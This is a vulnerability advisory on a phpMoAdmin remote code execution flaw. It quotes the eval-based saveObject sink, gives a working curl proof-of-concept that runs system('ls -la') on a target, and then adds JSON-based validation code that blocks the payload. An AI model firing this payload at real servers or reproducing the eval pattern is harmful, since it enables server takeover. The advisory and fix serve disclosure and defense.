<ul><li>/moadmin.php</li></ul><pre class="">
/**
* Saves an object
*
* @param string $collection
* @param string $obj
* @return array
*/
public function saveObject($collection, $obj) {
// $obj is the raw $_POST['object'] string (see the handler below): this is the RCE sink
eval('$obj=' . $obj . ';'); //cast from string to array
return $this->mongo->selectCollection($collection)->save($obj);
}
….
$action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections');
if (isset($_POST['object'])) {
if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
return $this->_dumpFormVals();
} else {
$action = 'editObject';
$_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.';
}
</pre><p>saveObject passes the user-supplied object parameter straight into eval (the comment calls it a cast from string to array), so any PHP placed in the POST body is executed by the web server, which is arbitrary code execution. Note that the eval runs before the collection is even selected, so the collection parameter need not be supplied; a payload ending in exit never reaches the save call at all.<br></p><p>With the following command, run ls on the target server:</p><pre class="">curl http://hatsuyuki.sakura/moadmin/moadmin.php -d "object=1;system('ls -la');exit"</pre><p>The response returned:</p><p><img alt="1D2529FE-66D1-47B1-ABF6-3FEFDD82586D.png" src="https://images.seebug.org/@/uploads/1433921840066-1D2529FE-66D1-47B1-ABF6-3FEFDD82586D.png" data-image-size="1044,160"><br></p>
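<p>As an added example (this is not phpMoAdmin's code and not its upstream fix), the following replaces the eval-based "cast from string to array" with a JSON parser and validation, and shows how the advisory's payload is rejected instead of executed. The function names parseObject, rejectOperatorKeys and validateCollectionName, the whitelist for collection names, and the sample inputs are all assumptions chosen for illustration; the actual Mongo save call is left out.</p>

```php
<?php
// Added example, not phpMoAdmin's code and not its upstream fix. It replaces
// the eval()-based "cast from string to array" in saveObject() with a JSON
// parser plus validation. Function names and the rules below are assumptions
// chosen for illustration; the Mongo save itself is left out.
declare(strict_types=1);

/**
 * Parse a user-supplied document without eval().
 * Only a JSON object is accepted; scalars, lists and malformed input are
 * rejected so that nothing in the request body is ever interpreted as PHP.
 *
 * @throws InvalidArgumentException
 */
function parseObject(string $raw): array
{
    $decoded = json_decode($raw, true, 32, JSON_BIGINT_AS_STRING);
    if (json_last_error() !== JSON_ERROR_NONE) {
        throw new InvalidArgumentException('object is not valid JSON: ' . json_last_error_msg());
    }
    if (!is_array($decoded)) {
        throw new InvalidArgumentException('object must be a JSON object, not a scalar');
    }
    if ($decoded !== [] && array_keys($decoded) === range(0, count($decoded) - 1)) {
        throw new InvalidArgumentException('object must be a JSON object, not a list');
    }
    rejectOperatorKeys($decoded);
    return $decoded;
}

/**
 * Refuse MongoDB operator keys ($set, $where, ...) at any nesting level:
 * a document handed to save() should carry data, not query operators.
 */
function rejectOperatorKeys(array $doc): void
{
    foreach ($doc as $key => $value) {
        if (is_string($key) && $key !== '' && $key[0] === '$') {
            throw new InvalidArgumentException("operator key not allowed: $key");
        }
        if (is_array($value)) {
            rejectOperatorKeys($value);
        }
    }
}

/**
 * Whitelist the collection name instead of passing $_GET['collection']
 * through unchecked. The character set here is a conservative assumption.
 */
function validateCollectionName(?string $name): string
{
    if ($name === null || !preg_match('/^[A-Za-z][A-Za-z0-9_.]{0,119}$/', $name)
        || strpos($name, 'system.') === 0) {
        throw new InvalidArgumentException('invalid collection name');
    }
    return $name;
}

// Constructed sample inputs: a normal document, the advisory's payload,
// a document smuggling an operator key, and a bare list.
$cases = [
    'benign'   => '{"name":"alice","tags":["a","b"],"age":30}',
    'exploit'  => "1;system('ls -la');exit",
    'operator' => '{"$where":"sleep(1000)"}',
    'list'     => '[1,2,3]',
];

foreach ($cases as $label => $raw) {
    try {
        $doc = parseObject($raw);
        printf("%-8s accepted: %s\n", $label, json_encode($doc));
    } catch (InvalidArgumentException $e) {
        printf("%-8s rejected: %s\n", $label, $e->getMessage());
    }
}

try {
    validateCollectionName('users');
    validateCollectionName('system.indexes');
} catch (InvalidArgumentException $e) {
    echo 'collection rejected: ', $e->getMessage(), "\n";
}
```

<p>In the handler shown above, the call saveObject($_GET['collection'], $_POST['object']) would become a parseObject / validateCollectionName pair wrapped in a try block, with the InvalidArgumentException mapped onto the existing $_POST['errors']['object'] message path, so a malformed body produces the "check your array syntax" error rather than code execution. The advisory's payload fails at json_decode, a bare number fails the object check, and a JSON list fails the list check; none of them ever reaches an interpreter.</p>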